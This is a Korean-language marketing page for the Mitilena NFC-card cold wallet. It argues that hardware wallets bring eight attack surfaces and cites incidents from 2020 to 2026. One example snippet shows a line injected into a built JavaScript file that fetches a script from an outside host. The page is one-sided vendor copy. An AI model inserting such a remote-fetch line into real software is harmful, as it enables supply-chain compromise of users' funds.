8가지 결함 오픈소스 체크리스트 FAQ
Mitilena Mitilena Wallet 콜드 암호화폐 지갑
ONLINE · 22,000+ COINS 지갑 만들기만들기
하드웨어 지갑 · 명백하지 않은 결함

명백하지 않은 하드웨어 지갑 결함

구멍을 막으려고 기기를 삽니다. 함께 오는 새 구멍들: 펌웨어, 업데이트, 컴퓨터의 서비스, 화면, 상자, 판매자 계정. 리뷰가 장점으로 적는 여덟 가지 — 그리고 2020–2026년에 그것으로 돈이 빠져나간 여덟 가지 방식.

날짜와 금액이 있는 실제 사건 제조사 문서 기준 우리 키트도 같은 목록으로 채점
실수의 대가공개 사례
2026Coldcard · 펌웨어의 약한 난수$100M+
2025Bybit · 서명자가 보지 못한 것에 서명$1.5B
2024Dark Skippy · 서명 두 번으로 시드 유출연구
2023Ledger Connect Kit · 라이브러리 백도어$600K
2021App Store의 가짜 지갑 앱17,1 BTC
2020Ledger 고객 DB 유출 · 수년간 피싱270,000명
여덟 가지 결함

리뷰가 칭찬하는 모든 요소가 따로따로 구멍입니다

하드웨어 지갑은 구멍 하나를 막습니다: 키가 더 이상 인터넷 있는 폰에 있지 않습니다. 하지만 기기는 비어 있지 않습니다. 펌웨어, 업데이트, PC 프로그램, 화면, 상자, 주소까지 아는 판매자 — 각 요소가 예전엔 없던 공격면을 더합니다. 아래 여덟 가지: 리뷰가 뭐라고 하는지, 그것으로 어떻게 돈이 나갔는지, 구멍을 어떻게 막는지, 우리 키트에 그 요소가 있는지.

결함 01

당신의 키를 만드는 펌웨어

리뷰에서: «보안 칩 — 키는 기기 안에서 만들어지고 절대 나가지 않습니다»

키는 거대한 난수이고, 만드는 것은 펌웨어입니다. 거기 버그 하나면 — 키는 생각보다 훨씬 적습니다: 기기 접근 없이, 구매 수년 뒤에도, 모든 소유자 키를 한꺼번에 무차별 대입합니다. 칩은 무관합니다. 구멍은 그 위에 있습니다.

사건
$100M+
Coldcard, 2026년 7월: 2021년부터의 펌웨어 빌드 버그가 하드웨어 RNG를 기기 시리얼과 타이머로 시드된 약한 것으로 조용히 바꿨습니다. 키 강도가 대략 40비트로 떨어졌고, 5,000+ 주소가 비워졌습니다.
구멍을 막는 법
자신의 난수를 가져올 수 있는가: 주사위, 직접 정한 문구. 당신이 준 엔트로피를 받는 지갑은 펌웨어 버그 하나에 묶이지 않습니다.
우리에게는 이 요소가 없습니다
카드에는 펌웨어가 없습니다 ��� 암호화된 매체입니다. Mitilena Air가 기기 시스템 RNG로 키를 만들고, 무작위 단어 대신 직접 시드 문구를 정할 수 있습니다.
결함 02

강제로 깔아야 하는 업데이트

리뷰에서: «제조사가 정기적으로 보안 업데이트를 배포합니다»

업데이트마다 펌웨어를 바꿔 끼울 순간이 생깁니다. 조작된 펌웨어는 겉으로는 정상인 채, 평범한 서명 두세 번에 시드 조각을 숨깁니다. 업데이트를 안 할 수도 없습니다: 구멍은 그 업데이트로 막히기 때문입니다.

사건
2 signatures
Dark Skippy, August 2024: 연구자들이 악성 하드웨어 지갑 펌웨어가 거래 두 번으로 시드 전체를 빼낼 수 있음을 보였습니다. 잘못된 곳에서 온 업데이트 한 번이면 충분합니다.
구멍을 막는 법
펌웨어가 어디서 오는지, 기기가 서명을 검증하는지. 최선은 업데이트할 것이 아예 없을 때입니다.
우리에게는 이 요소가 없습니다
카드에는 업데이트하거나 바꿔 끼울 것이 없습니다. 서명은 폰 앱에서 이뤄지고, 빌드는 서명되어 App Store와 Google Play에서 옵니다 — 당신이 보고 닫는 다른 앱과 같습니다.
결함 03 · 부조리를 느껴 보세요
리뷰에서: «편리한 제조사 PC 앱»

불신을 위해 샀는데 백그라운드 서비스가 딸려 오는 지갑

컴퓨터를 더 이상 믿지 않으려고 기기를 삽니다. 그런데 동작하려면 그 같은 컴퓨터에 백그라운드 서비스를 깔아야 합니다. 당신이 쓰지 않았고, 시작하지 않았고, 통제하지 않습니다: OS와 함께 뜨고, 기기 위 어떤 프로그램이든 두드릴 수 있는 포트를 듣고, 지금 무언가를 합니다 — 정확히 무엇인지는 모르고, 검증할 수�� 없습니다.

지갑을 닫은 뒤에도 백그라운드에서 돌았습니다. 수년 동안. 가장 큰 제조사 중 하나에서는 별도의 «브리지» 서비스였고, 2025년에는 앱 안으로 숨겼습니다 — 서비스는 그대로, 창과 함께 죽을 뿐입니다. 대부분 다른 제품은 PC 프로그램 없으면 기기는 열쇠고리입니다. Linux에서는 udev 규칙을 넣지 않으면 USB를 내주지 않습니다.

즉, 컴퓨터 프로그램에 의존하지 않으려고 산 물건이 컴퓨터 프로그램 없이는 동작하지 않습니다. 그리고 보이는 그 프로그램이 아니라 — 그 아래에서 도는 것입니다.

우리에게는 이 요소가 없습니다
컴퓨터에는 아무것도 설치되지 않습니다: 서비스도, 드라이버도, 포트도. 중개는 이미 폰에 있는 NFC 칩이고, 폰 제조사가 만들었으며 OS가 통제합니다: 앱이 열려 있고 당신이 카드를 댈 때만 동작하며, 폰이 매번 권한을 묻습니다. 카드는 수동적입니다: 배터리 없음, 라디오 없음, 스스로 아무것도 하지 않습니다. 앱을 닫으면 — 당신 없이 도는 것은 남지 않습니다. 솔직히: 폰 앱은 필요합니다. 다른 앱과 같습니다 — 보고, 실행하고, 직접 닫습니다. 다용도실에 사는 사람은 없습니다.
시스템 모니터지갑 닫힘
프로세스상태가동
HW Wallet Appwallet
당신이 닫음-
hwwalletd백그라운드 서비스 · USB 브리지
실행 중412d 06:14
로그인 시 시스템이 시작닫을 수 없음 — 서비스임
목업; 이름은 예시입니다. 2025년 이전 가장 인기 있는 USB 지갑 중 하나를 켠 컴퓨터의 모습입니다. 이후 «브리지»가 앱 안으로 들어갔습니다 — 같은 서비스, 목록에서만 안 보일 뿐입니다.
비유
프라이버시를 위한 집 — 그리고 다용도실의 세입자

프라이버시를 위해 집을 원했습니다. 샀습니다. 보안이 필요해 — 설치했습니다. 요금제가 동작하려면 제복 입은 사람을 집 안에 들이라고 했습니다. 그 사람은 다용도실에 24시간 살고, 모든 문 열쇠를 쥐고, 남에게 보고합니다. 고용하지 않았고, 해고할 수 없으며, 밤에 무엇을 하는지도 모릅니다.

물론 «우리 편»입니다. 계약서에 그렇게 적혀 있습니다. 프라이버시를 원했는데 대용품을 받았습니다: 선택하지 않은 세입자가 있는 집.

결함 04 · 오픈소스는 감사가 아닙니다
리뷰에서: «오픈소스 — 누구나 검증할 수 있습니다»

오픈소스는 프로그래머가 함께 일하는 방식이지, 프로그램이 훔치지 않는다는 배지가 아닙니다

오픈소스는 프로그램을 나누고 함께 고치려고 만들어졌습니다. 협업 도구로는 훌륭합니다. «이 소프트웨어가 돈을 훔치지 않는다»는 품질 도장은 된 적이 없습니다. 이유: 당신은 소스 코드를 쓰지 않습니다. 다운로드한 것을 씁니다.

GitHub 저장소와 폰의 파일 사이에는 빌드, 앱 스토어, 업데이트, 서버가 있습니다. 어느 단계에서든 어디서든 무엇이든 끌어오는 한 줄이 코드에 들어갈 수 있고 — 저장소에는 없습니다. 자기 사본을 소스와 비교할 수 없습니다: 스토어는 컴파일된 파일을 주고, 웹 지갑은 서버가 오늘 당신에게 주기로 한 코드를 받으며, 브라우저 확장 프로그램은 밤에 조용히 업데이트됩니다.

«열림»은 어떤 사람이 어떤 날 어떤 버전을 볼 수 있다는 뜻입니다. 지금 당신 사본이 무엇을 하는지는 — 그걸 뜻하지 않습니다.

저장소 · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
당신 폰 · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
빌드의 한 줄. 저장소에는 없고, 스토어에서는 안 보이며, 기기에서는 실행됩니다.
개방성이 막지 못한 사례들
Ledger Connect Kit2023
GitHub의 오픈 라이브러리; 악성 버전이 npm에 올라갔고, 수십 개 사이트가 몇 시간 안에 라이브로 불러왔습니다
Copay / event-stream2018
오픈 지갑; 백도어는 그것을 겨냥한 의존성을 통해 들어왔습니다
xz utils2024
20년간 공개; 한 엔지니어가 SSH 로그인이 0.5초 느려진 것을 눈치챌 때까지 릴리스에 백도어가 앉아 있었습니다
Coldcard2026
오픈소스 펌웨어; 5년간 빌드 버그가 하드웨어 RNG를 약한 것으로 바꿈 — 기기 접근 없이 키 무차별 대입, 5,000+ 주소, $100M+
실제로 통하는 것
남의 코드를 읽는 것이 아닙니다 — 누구나 할 수 있는 점검 두 가지. 첫째, 행동 감사: 컴퓨터에 가로채기 프록시를 두고 앱을 통과시켜, 어디로 무엇을 보내는지 봅니다. 코드를 읽을 필요 없습니다 — 트래픽이 전부 보입니다. 둘째, 훔칠 것이 없는 구조: 키가 네트워크 기기에 한 번도 앉지 않으면, 어떤 업데이트의 어떤 줄도 무력합니다 — 보낼 것이 없습니다.
우리는 이렇게
첫째는 우리가 직접 제안합니다: 우리 앱을 프록시로, 웹 버전은 브라우저 DevTools로 통과시켜 요청을 전부 보세요. 서명 키와 시드는 나오지 않습니다. 유일한 예외는 Monero view key — «송금이 어떻게 나가는지» 페이지에 있습니다. 둘째는 키트에 있습니다: 키는 인터넷 없는 기기에서 Mitilena Air로 태어나 카드에 살고, 온라인 앱에는 서명만 갑니다 — 프록시할 것이 없습니다. 여기 오프라인은 진짜입니다: air-gap 모드에서 키 기기는 아무것도 연결하지 않습니다 — 케이블도, Bluetooth도 없고, 거래는 눈으로 보는 QR로 들어가고 나옵니다. 온라인 컴퓨터에 케이블로 매달린 «콜드» 지갑과, 자기 서비스가 뭔지 모르는 것을 주고받는 그런 것이 아닙니다.
결함 05

무엇을 서명하는지 보이지 않는 화면

리뷰에서: «기기 화면에서 확인 — 컴퓨터 바이러스는 무력합니다»

화면은 작고, 주소와 금액이 아니라 해시나 «컨트랙트 호출»을 자주 보여 줍니다. 보이지 않는 것을 확인하고 — 서명은 그래도 정직한, 당신의 것입니다. 화면은 없는 통제감을 줍니다.

사건
$1.5B
Bybit, 2025년 2월: 하드웨어 지갑을 쓴 서명자들이 UI상 평범해 보이는 이체를 확인했습니다. 기기가 보여 준 데이터는 사람이 대조할 수 없었습니다.
구멍을 막는 법
수신자, 금액, 작업 유형을 사람 말로 — 해시가 아니라 — 그리고 거절 버튼 하나.
우리는 이렇게
화면은 있습니다. 다만 폰 화면입니다: 주소, 금액, 요청 유형을 말로 — 이체, 컨트랙트 호출, 승인 — 그리고 «거절» 버튼. 큰 금액은 — 전체 거래를 받는 별도 오프라인 기기.
결함 06

이미 시드가 들어 있는 상자

리뷰에서: «보안 봉인이 있는 밀봉 상자로 배송»

물리 기기는 배송, 중간상, «할인» 마켓플레이스를 뜻합니다. 지갑이 이미 설정된 채 오고, 안에 시드가 적힌 쪽지가 ��습니다. 또는 스토어의 닮은 앱이 «활성화를 위해 시드를 입력하세요»라고 합니다.

사건
17,1 BTC
App Store, 2021: 하드웨어 지갑 소유자가 닮은 앱에 시드를 넣고 17.1 BTC를 잃었습니다. 같은 해 DB 유출 뒤 Ledger 고객에게 «시드를 새 기기로 옮기세요»라는 편지와 가짜 기기가 배송됐습니다.
구멍을 막는 법
직접 초기화하고, 이미 적혀 온 시드는 쓰지 마세요. 봉인은 검증이 아닙니다. 검증은 당신이 키를 만드는 것입니다.
우리는 이렇게
카드는 빈 채로 옵니다: 당신이 키를 만들고 직접 씁니다 — 상자에 완성된 시드가 있을 수 없습니다. 앱은 사이트의 링크로만 App Store와 Google Play에서 오며, 시드는 가져오기와 서명 때만 묻습니다.
결함 07

판매자 계정

리뷰에서: «공식 보증, 지원, 개인 계정»

기기를 사려면 제조사에 이름, 이메일, 배송 주소를 줍니다. 이제 보안이 그들 DB에 달렸습니다. 유출되면 — 수년간 «새 기기에서 시드를 확인하세요» 메시지가 오고, 때로는 소포까지.

사건
270,000명
Ledger, 2020: 우편 주소 포함 구매자 270,000명의 데이터가 유출됐습니다. 시드를 «이전»하라는 이메일, 전화, 소포는 오늘날까지 이어집니다.
구멍을 막는 법
당신에 대해 알수록 벡터는 길어집니다: 계정 없이 사고, 시드를 절대 묻지 않는 지원, 그리고 «시드를 묻는 자는 도둑뿐» 규칙.
우리에게는 이 요소가 없습니다
지갑은 가입 없이 동작합니다 — 계정 없음. 판매자는 배송 주소만 압니다. 지원도 앱도 시드를 묻지 않습니다.
결함 08

기기 하나와 종이 한 장

리뷰에서: «튼튼한 케이스, 큰 화면, 일주일 배터리»

부품이 많을수록 고장도 많습니다: 커넥터, 화면, 배터리. 복구는 시드 쪽지 하나에 달립니다 — 물에 젖고, 이사 때 잃고, «만약을 위해» 사진 찍습니다. 손실의 가장 흔한 원인은 해킹이 아닙니다.

사건
≈20 % BTC
Chainalysis 추정: 비트코인 전체의 약 1/5가 영원히 소실 — 대개 해킹이 아니라 키 분실.
구멍을 막는 법
상자에 키 사본이 몇 개·어떤 형태로 오는지, 기기 분실 시 어떻게 되는지, 고장날 부품이 있는지.
우리에게는 이 요소가 없습니다
화면·배터리·커넥터 없음 — 고장날 것이 없습니다. 사본도 하나가 아닙니다: 상자 안 미러 사본 다섯 — NFC 카드 두 장과 방수 플라스틱의 스텔스 스티커 세 장, 10년 이상.
체크리스트

지갑에 있으면 안 되는 것

여덟 결함에 여덟 요소. 목록은 어떤 지갑에도 맞습니다 — 하드웨어, 모바일, 브라우저. 고르는 지갑에 무엇이 있는지 체크하세요 — 우리도 포함해서.

01
소프트웨어만으로 만든 키자신의 난수 없이 — 문구나 주사위
02
키가 사는 곳의 업데이트업데이트마다 코드를 바꿔 끼울 기회
03
컴퓨터의 서비스·드라이버·포트결함 03 참고
04
구조 대신 «오픈소스» 배지키가 남의 코드가 닿는 곳에 앉음
05
주소·금액 대신 해시를 보여 주는 화면그리고 거절 버튼 없음
06
이미 적혀 온 시드상자·편지·«활성화 앱» 안
07
판매자 계정시드를 물을 수 있는 지원
08
사본 하나와 고장 나는 부품화면, 배터리, 커넥터, 종이 한 장
이 목록에서 Ultimate 키트에는 여덟 요소가 하나도 없습니다. 상자: NFC 카드 2장과 스텔스 스티커 3장, Mitilena Air(인터넷 없는 키 생성)와 Mitilena Keys(인터넷 없는 서명). 카드는 빈 채로: 당신이 키를 만들어 암호화합니다 — 공장 칩이 아닙니다. 구성과 가격 →
Ultimate · 오프라인 키트

공장 «보안 칩»이 아니라 — 당신이 암호화하는 매체

카드는 빈 채로 옵니다. 인터넷 없는 폰에서 Mitilena Air로 키를 만들고 직접 씁니다. 서명도 Mitilena Keys로 오프라인: 거래는 QR로 이동합니다. 상자 안 동일 사본 다섯: NFC 카드 2장과 방수 플라스틱 스텔스 스티커 3장. 18개 네트워크, USDT 포함 20,000+ 코인.

컴퓨터에 아무것도 설치되지 않음
펌웨어·업데이트·화면·배터리 없음
오프라인 폰으로 거래 — 소리 또는 QR, 케이블·USB 없음
무료 Mitilena 폰 앱과 동작
방수 플라스틱, 보관 수명 10년+
전 세계 배송 · mitilena-store.com
Mitilena NFC 카드
Ultimate · 오프라인 생성과 서명
€369€439
2 NFC cards · 3 stealth stickers · Mitilena Air · Mitilena Keys license
Ultimate 구매 · €369 Basic과 Premium — 모든 플랜 보기
FAQ

여기까지 읽고 사람들이 묻는 것

하드웨어 지갑 장단점 — 짧게?

큰 장점 하나: 키가 인터넷 있는 폰에 있지 않습니다. 단점은 위의 여덟 요소 — 각각 공격면을 더합니다. 좋은 하드웨어 지갑은 요소가 더 많은 쪽이 아니라 더 적은 쪽입니다.

폰이 뚫리면요?

메인 폰의 카드에서는 서명하는 그 초에만 격리 환경에 키가 나타납니다 — 어떤 폰 지갑과 같은 위험, 다만 더 짧습니다. 겁나는 금액은 — 두 번째 층: 거래가 QR로 가는 별도 오프라인 기기에서 서명.

카드를 훔치거나 잃어버리면요?

비밀번호 없으면 카드와 스티커는 쓸모없는 플라스틱입니다 — 위 키는 암호화돼 있습니다. 잃어버린 사본은 나머지 넷으로 대체: 상자 안 카드 두 장과 스티커 세 장은 미러입니다.

하드웨어 지갑 펌웨어를 업데이트해야 하나요?

제조사가 구멍을 막았다면 — 예, 그리고 바로 그때 펌웨어를 바꿔 끼울 수 있습니다: 출처와 서명을 확인하세요. 펌웨어 없는 매체에는 그런 선택이 없습니다 — 업데이트할 것도, 바꿔 끼울 것도 없습니다.

USB 지갑과 뭐가 다른가요?

중개가 더 적습니다: 케이블·드라이버·백그라운드 서비스·PC 프로그램 없음. 중개 하나 — 폰의 NFC 칩 — 지갑 제조사가 아니라 당신과 OS에 답합니다.

오픈소스면 안전한가요?

언젠가 누군가가 볼 수 있다는 뜻입니다. 쓰는 것은 코드가 아니라 다운로드한 것이고, 둘을 비교할 수 없습니다. 안전은 키가 남의 코드가 닿는 곳에 있지 않은 구조에서 옵니다.

오프라인 생성·서명이 있는 NFC 카드

키 사본 5 · Air · Keys · 또는 30초 무료 지갑 · 칩 위의 «콜드» 하드웨어 지갑이 왜 종종 가짜인지 →
Ultimate 구매 · €369 무료 지갑 만들기